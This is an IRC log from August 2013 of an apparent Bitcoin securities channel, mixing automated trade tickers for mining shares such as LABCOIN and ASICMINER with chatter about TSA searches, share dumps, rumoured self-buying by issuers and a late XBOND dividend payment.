[ACTIVEMINING] 97 @ 0.005381 = 0.522 BTC [-] Aug 07 17:08:57 [BTCTC] [LABCOIN] 90 @ 0.001451 = 0.1306 BTC [-] Aug 07 17:10:45 [BTCTC] [DMS.MINING] 1 @ 0.006272 BTC [+] Aug 07 17:10:47 [BTCTC] [DMS.MINING] 23 @ 0.006271 = 0.1442 BTC [-] Aug 07 17:11:43 [BTCTC] [LABCOIN] 6 @ 0.001459 = 0.0088 BTC [+] Aug 07 17:12:45 [BTCTC] [LABCOIN] 97 @ 0.001465 = 0.1421 BTC [+] Aug 07 17:12:59 [BTCTC] [LABCOIN] 46 @ 0.001493 = 0.0687 BTC [+] Aug 07 17:18:21 [BTCTC] [TAT.ASICMINER] 3 @ 0.03762 = 0.1129 BTC [+] Aug 07 17:18:49 [BTCTC] [NASTY-PT] 2 @ 0.007 = 0.014 BTC [-] Aug 07 17:19:31 New ASICMINER Poll Questions: https://docs.google.com/forms/d/15Ws1XzJeynK_vsKiQ9NaufQfLZOSKsRfsSgqMLTdIRs Aug 07 17:21:48 [BTCTC] [NASTY-PT] 55 @ 0.007 = 0.385 BTC [-] Aug 07 17:21:49 [BTCTC] [NASTY-PT] 400 @ 0.0045 = 1.8 BTC [-] Aug 07 17:22:39 [BTCTC] [NASTY-PT] 145 @ 0.0045 = 0.6525 BTC [-] Aug 07 17:25:45 [BTCTC] [ASICMINER-PT] 1 @ 3.889 BTC [+] Aug 07 17:25:46 [BTCTC] [ASICMINER-PT] 1 @ 3.889 BTC [+] Aug 07 17:29:20 http://www.nytimes.com/2013/08/06/us/tsa-expands-duties-beyond-airport-security.html?_r=0 Aug 07 17:29:21 heh. Aug 07 17:30:34 I thought they were already doing it Aug 07 17:31:28 "T.S.A. officials respond that the random searches are “special needs” or “administrative searches” that are exempt from probable cause because they further the government’s need to prevent terrorist attacks." Aug 07 17:31:37 the deliciousness of this "administrative" Aug 07 17:32:06 i love enforced safety Aug 07 17:32:22 [BTCTC] [LABCOIN] 25 @ 0.001464 = 0.0366 BTC [-] Aug 07 17:32:27 that's what makes america great. our government creates laws to keep us safe Aug 07 17:32:44 [BTCTC] [BASIC-MINING] 2 @ 0.3306 = 0.6612 BTC [+] Aug 07 17:32:53 don't you want your government to make you wear seatbelt Aug 07 17:33:02 and spies on us to make sure we're not looking at things we shouldn't be Aug 07 17:33:14 and then stop you on the road to make sure you are wearing it Aug 07 17:33:26 oh and search your vehicle too Aug 07 17:33:47 [BTCTC] [NASTY-PT] 10 @ 0.0055 = 0.055 BTC [+] Aug 07 17:36:10 For harmful drugs of course Aug 07 17:36:13 for your safety Aug 07 17:36:19 http://trilema.com/2013/anonimity-not-for-the-poor/#comment-94372 Aug 07 17:36:22 found teh quote./ Aug 07 17:36:22 Anonimity : not for the poor. pe Trilema - Un blog de Mircea Popescu. Aug 07 17:36:36 [BTCTC] [TAT.ASICMINER] 1 @ 0.03754 BTC [-] Aug 07 17:38:00 [BTCTC] [LABCOIN] 414 @ 0.001461 = 0.6049 BTC [-] Aug 07 17:38:01 [BTCTC] [LABCOIN] 9 @ 0.001451 = 0.0131 BTC [-] Aug 07 17:38:02 [BTCTC] [LABCOIN] 1775 @ 0.00145 = 2.5738 BTC [-] Aug 07 17:38:10 [BTCTC] [LABCOIN] 2 @ 0.001461 = 0.0029 BTC [+] Aug 07 17:41:49 [BTCTC] [ASICMINER-PT] 1 @ 3.864 BTC [-] Aug 07 17:43:11 [BTCTC] [TAT.ASICMINER] 3 @ 0.03754 = 0.1126 BTC [-] Aug 07 17:44:21 [HAVELOCK] [LABCO] 10 @ 0.00141 = 0.0141 BTC [-] Aug 07 17:44:51 [BTCTC] [NASTY-PT] 10 @ 0.0055 = 0.055 BTC [+] Aug 07 17:45:09 [BTCTC] [TAT.ASICMINER] 1 @ 0.03753 BTC [-] Aug 07 17:45:21 [BTCTC] [BITVPS] 30 @ 0.001845 = 0.0554 BTC [+] Aug 07 17:47:24 [BTCTC] [NASTY-PT] 10 @ 0.0055 = 0.055 BTC [+] Aug 07 17:47:46 [BTCTC] [TAT.ASICMINER] 1 @ 0.03753 BTC [-] Aug 07 17:49:08 [BTCTC] [TAT.ASICMINER] 10 @ 0.037 = 0.37 BTC [-] Aug 07 17:49:09 [BTCTC] [TAT.ASICMINER] 10 @ 0.037 = 0.37 BTC [-] Aug 07 17:50:29 [BTCTC] [TAT.ASICMINER] 1 @ 0.03699 BTC [-] Aug 07 17:50:32 [BTCTC] [TAT.ASICMINER] 4 @ 0.03699 = 0.148 BTC [-] Aug 07 17:50:33 [BTCTC] [TAT.ASICMINER] 6 @ 0.037 = 0.222 BTC [+] Aug 07 17:50:46 [BTCTC] [TAT.ASICMINER] 4 @ 0.037 = 0.148 BTC [+] Aug 07 17:50:57 [BTCTC] [NASTY-PT] 10 @ 0.0055 = 0.055 BTC [+] Aug 07 17:51:16 [BTCTC] [TAT.ASICMINER] 1 @ 0.037 BTC [+] Aug 07 17:51:41 [BTCTC] [TAT.ASICMINER] 7 @ 0.037 = 0.259 BTC [+] Aug 07 17:55:07 [BTCTC] [TAT.ASICMINER] 5 @ 0.037 = 0.185 BTC [+] Aug 07 17:55:40 [BTCTC] [TAT.ASICMINER] 1 @ 0.037 BTC [+] Aug 07 17:56:31 [BTCTC] [NASTY-PT] 90 @ 0.0055 = 0.495 BTC [+] Aug 07 17:56:32 [BTCTC] [NASTY-PT] 10 @ 0.0055 = 0.055 BTC [+] Aug 07 17:56:34 [BTCTC] [NASTY-PT] 110 @ 0.004503 = 0.4953 BTC [-] Aug 07 17:56:35 [BTCTC] [NASTY-PT] 3 @ 0.004502 = 0.0135 BTC [-] Aug 07 17:56:36 [BTCTC] [NASTY-PT] 90 @ 0.0045 = 0.405 BTC [-] Aug 07 17:56:36 [BTCTC] [NASTY-PT] 300 @ 0.0045 = 1.35 BTC [-] Aug 07 17:56:38 [BTCTC] [ACTIVEMINING] 50 @ 0.005588 = 0.2794 BTC [+] Aug 07 17:56:39 [BTCTC] [ACTIVEMINING] 15 @ 0.005589 = 0.0838 BTC [+] Aug 07 17:56:40 [BTCTC] [ACTIVEMINING] 75 @ 0.00559 = 0.4193 BTC [+] Aug 07 17:57:28 [BTCTC] [NASTY-PT] 70 @ 0.0045 = 0.315 BTC [-] Aug 07 17:57:45 [BTCTC] [NASTY-PT] 327 @ 0.0045 = 1.4715 BTC [-] Aug 07 17:57:46 [BTCTC] [NASTY-PT] 110 @ 0.005999 = 0.6599 BTC [+] Aug 07 17:57:47 [BTCTC] [NASTY-PT] 105 @ 0.006 = 0.63 BTC [+] Aug 07 17:57:56 [BTCTC] [LABCOIN] 125 @ 0.001435 = 0.1794 BTC [-] Aug 07 17:57:57 [BTCTC] [LABCOIN] 30 @ 0.00143 = 0.0429 BTC [-] Aug 07 17:57:58 [BTCTC] [LABCOIN] 100 @ 0.001427 = 0.1427 BTC [-] Aug 07 17:57:59 [BTCTC] [LABCOIN] 10000 @ 0.001425 = 14.25 BTC [-] Aug 07 17:58:01 [BTCTC] [LABCOIN] 50 @ 0.001425 = 0.0713 BTC [-] Aug 07 17:58:39 So, NASTY-PT is currently naked pass-thru? What if seats cost more than the capital raised? Aug 07 17:58:47 or worse less? Aug 07 17:59:25 I'm trying to get the person to take my shares on nastyfans.org so I can sell em on btct :P Aug 07 17:59:39 [BTCTC] [TAT.ASICMINER] 3 @ 0.037 = 0.111 BTC [+] Aug 07 18:00:15 [BTCTC] [NASTY-PT] 1 @ 0.00555 BTC [-] Aug 07 18:01:11 [BTCTC] [LABCOIN] 2 @ 0.001451 = 0.0029 BTC [+] Aug 07 18:01:14 [BTCTC] [ACTIVEMINING] 50 @ 0.005573 = 0.2787 BTC [-] Aug 07 18:01:15 [BTCTC] [ACTIVEMINING] 68 @ 0.005574 = 0.379 BTC [+] Aug 07 18:01:17 [BTCTC] [ACTIVEMINING] 23 @ 0.005576 = 0.1282 BTC [+] Aug 07 18:01:18 [BTCTC] [ACTIVEMINING] 7 @ 0.005589 = 0.0391 BTC [+] Aug 07 18:01:19 [BTCTC] [ACTIVEMINING] 75 @ 0.00559 = 0.4193 BTC [+] Aug 07 18:01:19 [BTCTC] [ACTIVEMINING] 2 @ 0.00559 = 0.0112 BTC [+] Aug 07 18:05:33 [BTCTC] [ACTIVEMINING] 2 @ 0.005398 = 0.0108 BTC [-] Aug 07 18:07:23 [BTCTC] [ACTIVEMINING] 2 @ 0.005397 = 0.0108 BTC [-] Aug 07 18:07:24 [BTCTC] [ACTIVEMINING] 12 @ 0.005398 = 0.0648 BTC [+] Aug 07 18:11:45 [BTCTC] [ASICMINER-PT] 1 @ 3.88 BTC [+] Aug 07 18:12:07 [BTCTC] [LABCOIN] 220 @ 0.001428 = 0.3142 BTC [-] Aug 07 18:12:08 [BTCTC] [LABCOIN] 50 @ 0.001427 = 0.0714 BTC [-] Aug 07 18:12:10 [BTCTC] [LABCOIN] 1000 @ 0.001424 = 1.424 BTC [-] Aug 07 18:12:11 [BTCTC] [LABCOIN] 1250 @ 0.001423 = 1.7788 BTC [-] Aug 07 18:12:56 [BTCTC] [TAT.ASICMINER] 4 @ 0.03689 = 0.1476 BTC [-] Aug 07 18:12:57 [BTCTC] [TAT.ASICMINER] 7 @ 0.0369 = 0.2583 BTC [+] Aug 07 18:13:49 [BTCTC] [NASTY-PT] 176 @ 0.0049 = 0.8624 BTC [-] Aug 07 18:13:49 Exocyst i believe the word is nasty. Aug 07 18:13:50 [BTCTC] [NASTY-PT] 105 @ 0.004751 = 0.4989 BTC [-] Aug 07 18:13:50 [BTCTC] [NASTY-PT] 100 @ 0.00475 = 0.475 BTC [-] Aug 07 18:13:51 [BTCTC] [NASTY-PT] 42 @ 0.00474 = 0.1991 BTC [-] Aug 07 18:13:52 [BTCTC] [NASTY-PT] 100 @ 0.004699 = 0.4699 BTC [-] Aug 07 18:18:06 [BTCTC] [LABCOIN] 50 @ 0.001424 = 0.0712 BTC [+] Aug 07 18:18:07 [BTCTC] [LABCOIN] 710 @ 0.001423 = 1.0103 BTC [-] Aug 07 18:19:33 Also for those interested, it is not possible to transfer shares from Nastyfans.org to BTCT, so says the issuer Aug 07 18:21:17 no arb for you! Aug 07 18:21:33 thats just nasty Aug 07 18:22:11 [BTCTC] [LABCOIN] 1500 @ 0.001422 = 2.133 BTC [-] Aug 07 18:23:05 [BTCTC] [BTCGARDEN] 100 @ 0.01571 = 1.571 BTC [+] Aug 07 18:23:18 I see what you did there Aug 07 18:24:00 oh Aug 07 18:24:03 i see what i did there Aug 07 18:24:07 It is raining so hard here Aug 07 18:24:15 [BTCTC] [LABCOIN] 2 @ 0.001438 = 0.0029 BTC [+] Aug 07 18:24:35 [BTCTC] [LABCOIN] 50 @ 0.001439 = 0.072 BTC [+] Aug 07 18:24:36 [BTCTC] [LABCOIN] 498 @ 0.001438 = 0.7161 BTC [-] Aug 07 18:24:38 [BTCTC] [LABCOIN] 2169 @ 0.001422 = 3.0843 BTC [-] Aug 07 18:24:38 [BTCTC] [LABCOIN] 5500 @ 0.00142 = 7.81 BTC [-] Aug 07 18:24:39 [BTCTC] [LABCOIN] 30 @ 0.001401 = 0.042 BTC [-] Aug 07 18:24:40 [BTCTC] [LABCOIN] 800 @ 0.0014 = 1.12 BTC [-] Aug 07 18:24:41 [BTCTC] [LABCOIN] 1200 @ 0.0014 = 1.68 BTC [-] Aug 07 18:24:43 [BTCTC] [LABCOIN] 200 @ 0.0014 = 0.28 BTC [-] Aug 07 18:24:44 [BTCTC] [LABCOIN] 90 @ 0.0014 = 0.126 BTC [-] Aug 07 18:24:45 [BTCTC] [LABCOIN] 5488 @ 0.001399 = 7.6777 BTC [-] Aug 07 18:24:46 [BTCTC] [LABCOIN] 312 @ 0.001376 = 0.4293 BTC [-] Aug 07 18:24:47 [BTCTC] [LABCOIN] 2500 @ 0.001375 = 3.4375 BTC [-] Aug 07 18:24:48 [BTCTC] [LABCOIN] 100 @ 0.001367 = 0.1367 BTC [-] Aug 07 18:24:48 [BTCTC] [LABCOIN] 800 @ 0.001366 = 1.0928 BTC [-] Aug 07 18:24:49 [BTCTC] [LABCOIN] 3663 @ 0.001362 = 4.989 BTC [-] Aug 07 18:24:50 [BTCTC] [LABCOIN] 187 @ 0.001361 = 0.2545 BTC [-] Aug 07 18:24:51 [BTCTC] [LABCOIN] 3 @ 0.00136 = 0.0041 BTC [-] Aug 07 18:24:52 [BTCTC] [LABCOIN] 1500 @ 0.00136 = 2.04 BTC [-] Aug 07 18:24:54 [BTCTC] [LABCOIN] 3 @ 0.001357 = 0.0041 BTC [-] Aug 07 18:24:55 [BTCTC] [LABCOIN] 1650 @ 0.001357 = 2.2391 BTC [-] Aug 07 18:24:55 dump those labcoins! Aug 07 18:24:56 [BTCTC] [LABCOIN] 75 @ 0.001356 = 0.1017 BTC [-] Aug 07 18:24:57 [BTCTC] [LABCOIN] 1800 @ 0.001355 = 2.439 BTC [-] Aug 07 18:24:58 [BTCTC] [LABCOIN] 10000 @ 0.001355 = 13.55 BTC [-] Aug 07 18:24:59 [BTCTC] [LABCOIN] 1325 @ 0.001355 = 1.7954 BTC [-] Aug 07 18:24:59 [BTCTC] [LABCOIN] 125 @ 0.00135 = 0.1688 BTC [-] Aug 07 18:25:00 [BTCTC] [LABCOIN] 1000 @ 0.001349 = 1.349 BTC [-] Aug 07 18:25:01 [BTCTC] [LABCOIN] 50 @ 0.001348 = 0.0674 BTC [-] Aug 07 18:25:02 [BTCTC] [LABCOIN] 400 @ 0.001347 = 0.5388 BTC [-] Aug 07 18:25:03 [BTCTC] [LABCOIN] 1 @ 0.001331 BTC [-] Aug 07 18:25:04 [BTCTC] [LABCOIN] 15 @ 0.00133 = 0.02 BTC [-] Aug 07 18:25:05 [BTCTC] [LABCOIN] 37 @ 0.001321 = 0.0489 BTC [-] Aug 07 18:25:06 [BTCTC] [LABCOIN] 300 @ 0.00132 = 0.396 BTC [-] Aug 07 18:25:07 [BTCTC] [LABCOIN] 168 @ 0.001303 = 0.2189 BTC [-] Aug 07 18:25:08 [BTCTC] [LABCOIN] 100 @ 0.001302 = 0.1302 BTC [-] Aug 07 18:25:09 [BTCTC] [LABCOIN] 100 @ 0.001302 = 0.1302 BTC [-] Aug 07 18:25:09 [BTCTC] [LABCOIN] 2000 @ 0.001302 = 2.604 BTC [-] Aug 07 18:25:10 [BTCTC] [LABCOIN] 30 @ 0.001301 = 0.039 BTC [-] Aug 07 18:25:11 [BTCTC] [LABCOIN] 1000 @ 0.0013 = 1.3 BTC [-] Aug 07 18:25:12 [BTCTC] [LABCOIN] 3201 @ 0.0013 = 4.1613 BTC [-] Aug 07 18:25:13 [BTCTC] [LABCOIN] 1000 @ 0.0013 = 1.3 BTC [-] Aug 07 18:25:14 [BTCTC] [LABCOIN] 450 @ 0.001291 = 0.581 BTC [-] Aug 07 18:25:15 [BTCTC] [LABCOIN] 2500 @ 0.001289 = 3.2225 BTC [-] Aug 07 18:25:15 Time for the daily dump Aug 07 18:25:16 [BTCTC] [LABCOIN] 400 @ 0.001289 = 0.5156 BTC [-] Aug 07 18:25:17 [BTCTC] [LABCOIN] 1000 @ 0.00128 = 1.28 BTC [-] Aug 07 18:25:17 weeeee Aug 07 18:25:18 [BTCTC] [LABCOIN] 8000 @ 0.00126 = 10.08 BTC [-] Aug 07 18:25:19 [BTCTC] [LABCOIN] 400 @ 0.001251 = 0.5004 BTC [-] Aug 07 18:25:20 [BTCTC] [LABCOIN] 8000 @ 0.00125 = 10 BTC [-] Aug 07 18:25:21 [BTCTC] [LABCOIN] 3000 @ 0.00125 = 3.75 BTC [-] Aug 07 18:25:22 [BTCTC] [LABCOIN] 965 @ 0.001234 = 1.1908 BTC [-] Aug 07 18:25:23 [BTCTC] [LABCOIN] 815 @ 0.00123 = 1.0025 BTC [-] Aug 07 18:26:06 [BTCTC] [DMS.PURCHASE] 20 @ 0.02832 = 0.5664 BTC [+] Aug 07 18:26:36 [BTCTC] [LABCOIN] 50 @ 0.001403 = 0.0702 BTC [+] Aug 07 18:26:37 [BTCTC] [LABCOIN] 3 @ 0.001402 = 0.0042 BTC [-] Aug 07 18:27:40 The FAQ for the 500 Thash mine, IceDrill.ASIC powered by HashFast is now out :) https://bitcointalk.org/index.php?topic=269216.msg2884487#msg2884487 Aug 07 18:27:47 [BTCTC] [DMS.PURCHASE] 2000 @ 0.02832 = 56.64 BTC [+] Aug 07 18:28:05 [BTCTC] [LABCOIN] 50 @ 0.001398 = 0.0699 BTC [-] Aug 07 18:28:05 [BTCTC] [LABCOIN] 50 @ 0.001399 = 0.07 BTC [+] Aug 07 18:29:46 [BTCTC] [LABCOIN] 50 @ 0.001394 = 0.0697 BTC [-] Aug 07 18:30:35 [BTCTC] [DMS.PURCHASE] 100 @ 0.02832 = 2.832 BTC [+] Aug 07 18:30:44 [BTCTC] [LABCOIN] 30 @ 0.00139 = 0.0417 BTC [-] Aug 07 18:30:45 [BTCTC] [S.MPOE-PT] 1 @ 0.0008602 BTC [-] Aug 07 18:31:01 [BTCTC] [LABCOIN] 1 @ 0.001389 BTC [-] Aug 07 18:32:19 [BTCTC] [LABCOIN] 19 @ 0.001381 = 0.0262 BTC [-] Aug 07 18:33:09 [BTCTC] [BTCGARDEN] 80 @ 0.01594 = 1.2752 BTC [+] Aug 07 18:33:10 [BTCTC] [BTCGARDEN] 2 @ 0.01595 = 0.0319 BTC [+] Aug 07 18:33:12 [BTCTC] [BTCGARDEN] 10 @ 0.01595 = 0.1595 BTC [+] Aug 07 18:33:13 [BTCTC] [BTCGARDEN] 98 @ 0.01599 = 1.567 BTC [+] Aug 07 18:33:14 [BTCTC] [BTCGARDEN] 42 @ 0.01599 = 0.6716 BTC [+] Aug 07 18:33:17 [HAVELOCK] [XBOND] 50 @ 0.001028 = 0.0514 BTC [+] Aug 07 18:34:04 [BTCTC] [BTCGARDEN] 28 @ 0.01599 = 0.4477 BTC [+] Aug 07 18:34:05 [BTCTC] [BTCGARDEN] 47 @ 0.016 = 0.752 BTC [+] Aug 07 18:34:06 [BTCTC] [BTCGARDEN] 45 @ 0.016 = 0.72 BTC [+] Aug 07 18:34:13 [BTCTC] [LABCOIN] 3 @ 0.00137 = 0.0041 BTC [-] Aug 07 18:35:27 [HAVELOCK] [SDSTM] 7 @ 0.00649999 = 0.0455 BTC [+] Aug 07 18:35:32 [BTCTC] [LABCOIN] 235 @ 0.001366 = 0.321 BTC [-] Aug 07 18:35:35 [BTCTC] [LABCOIN] 35 @ 0.001368 = 0.0479 BTC [+] Aug 07 18:35:36 [BTCTC] [LABCOIN] 6 @ 0.001371 = 0.0082 BTC [+] Aug 07 18:35:37 [BTCTC] [LABCOIN] 50 @ 0.001372 = 0.0686 BTC [+] Aug 07 18:35:39 [BTCTC] [LABCOIN] 3644 @ 0.001376 = 5.0141 BTC [+] Aug 07 18:35:39 [BTCTC] [LABCOIN] 9 @ 0.001377 = 0.0124 BTC [+] Aug 07 18:36:20 [BTCTC] [LABCOIN] 50 @ 0.001374 = 0.0687 BTC [-] Aug 07 18:36:22 [BTCTC] [LABCOIN] 235 @ 0.001375 = 0.3231 BTC [+] Aug 07 18:36:23 [BTCTC] [LABCOIN] 446 @ 0.001377 = 0.6141 BTC [+] Aug 07 18:37:34 [BTCTC] [LABCOIN] 50 @ 0.001392 = 0.0696 BTC [+] Aug 07 18:37:35 [BTCTC] [LABCOIN] 31 @ 0.001393 = 0.0432 BTC [+] Aug 07 18:37:47 [BTCTC] [ASICMINER-PT] 1 @ 3.883 BTC [+] Aug 07 18:38:04 [BTCTC] [LABCOIN] 50 @ 0.001389 = 0.0695 BTC [-] Aug 07 18:38:05 [BTCTC] [LABCOIN] 25 @ 0.001391 = 0.0348 BTC [+] Aug 07 18:38:44 [BTCTC] [LABCOIN] 50 @ 0.001381 = 0.0691 BTC [-] Aug 07 18:38:45 [HAVELOCK] [XBOND] 2 @ 0.001028 = 0.0021 BTC [+] Aug 07 18:39:03 [BTCTC] [LABCOIN] 50 @ 0.00138 = 0.069 BTC [-] Aug 07 18:39:04 [BTCTC] [LABCOIN] 28 @ 0.001381 = 0.0387 BTC [+] Aug 07 18:39:05 [BTCTC] [LABCOIN] 6 @ 0.001383 = 0.0083 BTC [+] Aug 07 18:39:07 [BTCTC] [LABCOIN] 50 @ 0.001384 = 0.0692 BTC [+] Aug 07 18:39:08 [BTCTC] [LABCOIN] 5 @ 0.001392 = 0.007 BTC [+] Aug 07 18:39:09 [BTCTC] [LABCOIN] 44 @ 0.001393 = 0.0613 BTC [+] Aug 07 18:39:10 [BTCTC] [LABCOIN] 138 @ 0.001393 = 0.1922 BTC [+] Aug 07 18:40:43 [BTCTC] [LABCOIN] 50 @ 0.001374 = 0.0687 BTC [-] Aug 07 18:40:45 [BTCTC] [LABCOIN] 39 @ 0.001375 = 0.0536 BTC [+] Aug 07 18:41:04 [BTCTC] [LABCOIN] 50 @ 0.001373 = 0.0687 BTC [-] Aug 07 18:41:05 [BTCTC] [LABCOIN] 4 @ 0.001374 = 0.0055 BTC [+] Aug 07 18:41:06 [BTCTC] [LABCOIN] 6 @ 0.001392 = 0.0084 BTC [+] Aug 07 18:41:07 [BTCTC] [LABCOIN] 50 @ 0.001393 = 0.0697 BTC [+] Aug 07 18:41:08 [BTCTC] [LABCOIN] 1000 @ 0.001398 = 1.398 BTC [+] Aug 07 18:41:09 [BTCTC] [LABCOIN] 12 @ 0.001398 = 0.0168 BTC [+] Aug 07 18:41:10 [BTCTC] [LABCOIN] 100 @ 0.001399 = 0.1399 BTC [+] Aug 07 18:41:11 [BTCTC] [LABCOIN] 118 @ 0.0014 = 0.1652 BTC [+] Aug 07 18:41:13 [BTCTC] [LABCOIN] 31 @ 0.001421 = 0.0441 BTC [+] Aug 07 18:41:14 [BTCTC] [LABCOIN] 252 @ 0.001422 = 0.3583 BTC [+] Aug 07 18:41:15 [BTCTC] [LABCOIN] 24 @ 0.001462 = 0.0351 BTC [+] Aug 07 18:41:16 [BTCTC] [LABCOIN] 121 @ 0.001463 = 0.177 BTC [+] Aug 07 18:41:23 seriosuly fuck labcoin Aug 07 18:41:47 ok Aug 07 18:42:39 ? Aug 07 18:42:47 I don't want to catch a disease Aug 07 18:43:54 [BTCTC] [ACTIVEMINING] 25 @ 0.00552 = 0.138 BTC [+] Aug 07 18:43:55 [BTCTC] [ACTIVEMINING] 68 @ 0.005521 = 0.3754 BTC [+] Aug 07 18:44:09 [BTCTC] [BASIC-MINING] 4 @ 0.3306 = 1.3224 BTC [+] Aug 07 18:44:14 ;;nethash Aug 07 18:44:15 355055.490798 Aug 07 18:44:17 ;;estimate Aug 07 18:44:18 Next difficulty estimate | None based on data since last change | 49599922.2269 based on data for last three days Aug 07 18:45:30 [BTCTC] [TAT.ASICMINER] 10 @ 0.03653 = 0.3653 BTC [-] Aug 07 18:45:32 [BTCTC] [TAT.ASICMINER] 5 @ 0.03653 = 0.1827 BTC [-] Aug 07 18:45:34 [BTCTC] [TAT.ASICMINER] 39 @ 0.0365 = 1.4235 BTC [-] Aug 07 18:45:56 there's a rumor that labcoin is buying up it's own stock through a third party Aug 07 18:46:00 and flipping it Aug 07 18:46:10 just to rebuy it's tsock Aug 07 18:46:16 [BTCTC] [BASIC-MINING] 1 @ 0.3305 BTC [-] Aug 07 18:46:17 [BTCTC] [BASIC-MINING] 6 @ 0.3303 = 1.9818 BTC [-] Aug 07 18:46:19 [BTCTC] [BASIC-MINING] 3 @ 0.3301 = 0.9903 BTC [-] Aug 07 18:46:25 just to pump it' snumbers Aug 07 18:48:06 There's a rumor going on rumors are unreliable. The implications are uncertain. It appears it's unreliable that rumors are unreliable. Aug 07 18:48:14 [BTCTC] [TAT.ASICMINER] 3 @ 0.03688 = 0.1106 BTC [+] Aug 07 18:48:15 [BTCTC] [TAT.ASICMINER] 17 @ 0.03688 = 0.627 BTC [+] Aug 07 18:48:25 [BTCTC] [LABCOIN] 10 @ 0.001398 = 0.014 BTC [-] Aug 07 18:48:30 Further studies will be required. Aug 07 18:48:39 [BTCTC] [ACTIVEMINING] 30 @ 0.005523 = 0.1657 BTC [+] Aug 07 18:48:56 [BTCTC] [LABCOIN] 3 @ 0.001398 = 0.0042 BTC [-] Aug 07 18:49:25 it's more like a conspiracy theory Aug 07 18:49:36 especially because it is believable Aug 07 18:50:25 i heard that rumor Aug 07 18:50:45 [BTCTC] [LABCOIN] 3 @ 0.001398 = 0.0042 BTC [-] Aug 07 18:50:47 Where did you hear that rumor Aug 07 18:50:56 so it is true? Aug 07 18:51:06 [BTCTC] [DMS.PURCHASE] 20 @ 0.02832 = 0.5664 BTC [+] Aug 07 18:51:19 No need to have heard it. You can make stuff up on the spot and say your heard it as a rumor. Aug 07 18:51:28 isn't labcoin the one that recently said they wouldn't sell more than 25% of their peronsla shares/ Aug 07 18:51:29 i heard it here Aug 07 18:51:44 or was that garden Aug 07 18:51:47 [BTCTC] [LABCOIN] 4 @ 0.001398 = 0.0056 BTC [-] Aug 07 18:51:47 ThickAsThieves told me Aug 07 18:51:51 [HAVELOCK] [LABCO] 2 @ 0.00177 = 0.0035 BTC [+] Aug 07 18:51:57 If it was known, it wouldn't be a rumor, lque Aug 07 18:52:07 rumor is that these new mining offerings are obviously having a fun time Aug 07 18:52:17 investors make it easy for them Aug 07 18:52:17 dump, then pump Aug 07 18:52:20 IPOs just appear and have no output and expect to 'make money' but they can sell shares Aug 07 18:52:22 or pump, then dump Aug 07 18:52:39 the ones who offer the ipo can just dump their shares Aug 07 18:52:42 [BTCTC] [BFMINES] 6 @ 0.003982 = 0.0239 BTC [-] Aug 07 18:52:46 of course BTCGarden didnt sell out Aug 07 18:52:50 you can observe the shares activity to fuel the conspiracy theory though. highly believable in the case of AMC for example Aug 07 18:52:51 they bought their own shares Aug 07 18:52:55 so it's going to be refunded? Aug 07 18:52:57 and garden Aug 07 18:53:00 probably with labcoin money Aug 07 18:53:06 who knows Aug 07 18:53:33 so much market making Aug 07 18:53:35 Business plan: 1) IPO 2) ??? 3) Profit! Aug 07 18:53:35 from what i've read the shareholders are buying those up Aug 07 18:53:44 already invested shareholders Aug 07 18:53:54 but high share count investors Aug 07 18:54:00 scrypt asic IPO gonna dominate Aug 07 18:54:03 2 more weeks Aug 07 18:54:04 i just want the scammers to be outed Aug 07 18:54:11 so the bleeding can begin Aug 07 18:54:22 and then maybe the market gets a little calloused Aug 07 18:54:43 but the scammers likely realize this Aug 07 18:54:52 and will drrraaaaaaag it out Aug 07 18:56:44 Scam might not be the good word actually. People seem to be satisfied when it's proven the company *exists* Aug 07 18:57:06 [BTCTC] [LABCOIN] 10 @ 0.001397 = 0.014 BTC [-] Aug 07 18:57:20 satisfied by a "NDA" and pictures of an empty building Aug 07 18:57:49 it's a scam in the sense that investors are never going to profit and the issuer is likely aware of it Aug 07 18:58:21 [BTCTC] [TAT.ASICMINER] 3 @ 0.0369 = 0.1107 BTC [+] Aug 07 18:58:42 [BTCTC] [TAT.ASICMINER] 1 @ 0.03799 BTC [+] Aug 07 18:59:12 [BTCTC] [TAT.ASICMINER] 28 @ 0.03798 = 1.0634 BTC [-] Aug 07 18:59:25 [BTCTC] [LABCOIN] 19 @ 0.001397 = 0.0265 BTC [-] Aug 07 18:59:59 [HAVELOCK] [XBOND] [PAID] 1.00931000 BTC to 2`018`620 shares, 50 satoshi per share Aug 07 19:00:19 sorry for the delayed XBONd payment today Aug 07 19:00:26 human error Aug 07 19:00:45 you can't automate a few days ahead? Aug 07 19:00:51 i did Aug 07 19:01:05 but Havelock has a different wallet for every asset Aug 07 19:01:13 and i emptied that one Aug 07 19:01:18 [HAVELOCK] [XBOND] 1 @ 0.001028 BTC [+] Aug 07 19:01:26 to relieve HAvelock's hot wallet Aug 07 19:01:34 forgetting that divs needed to be paid from it Aug 07 19:01:38 [HAVELOCK] [XBOND] 1 @ 0.001028 BTC [+] Aug 07 19:03:16 [BTCTC] [LABCOIN] 235 @ 0.001374 = 0.3229 BTC [-] Aug 07 19:03:20 [BTCTC] [LABCOIN] 150 @ 0.00137 = 0.2055 BTC [-] Aug 07 19:03:24 [BTCTC] [LABCOIN] 1 @ 0.001351 BTC [-] Aug 07 19:03:27 [BTCTC] [LABCOIN] 800 @ 0.00135 = 1.08 BTC [-] Aug 07 19:03:30 [BTCTC] [LABCOIN] 3783 @ 0.001319 = 4.9898 BTC [-] Aug 07 19:03:38 [BTCTC] [LABCOIN] 473 @ 0.001318 = 0.6234 BTC [-] Aug 07 19:03:40 [BTCTC] [LABCOIN] 252 @ 0.001302 = 0.3281 BTC [-] Aug 07 19:03:43 [BTCTC] [LABCOIN] 20 @ 0.001301 = 0.026 BTC [-] Aug 07 19:03:44 [BTCTC] [LABCOIN] 2000 @ 0.0013 = 2.6 BTC [-] Aug 07 19:03:46 [BTCTC] [LABCOIN] 4 @ 0.001262 = 0.005 BTC [-] Aug 07 19:03:49 [BTCTC] [LABCOIN] 37 @ 0.001261 = 0.0467 BTC [-] Aug 07 19:03:50 labcoin is almost back to IPO price lol Aug 07 19:03:51 [BTCTC] [LABCOIN] 300 @ 0.00126 = 0.378 BTC [-] Aug 07 19:03:54 [BTCTC] [LABCOIN] 125 @ 0.001254 = 0.1568 BTC [-] Aug 07 19:03:56 [BTCTC] [LABCOIN] 1000 @ 0.001253 = 1.253 BTC [-] Aug 07 19:03:59 [BTCTC] [LABCOIN] 72 @ 0.001252 = 0.0901 BTC [-] Aug 07 19:04:00 [BTCTC] [LABCOIN] 100 @ 0.001251 = 0.1251 BTC [-] Aug 07 19:04:02 [BTCTC] [LABCOIN] 200 @ 0.00125 = 0.25 BTC [-] Aug 07 19:04:09 [BTCTC] [LABCOIN] 180 @ 0.00125 = 0.225 BTC [-] Aug 07 19:04:20 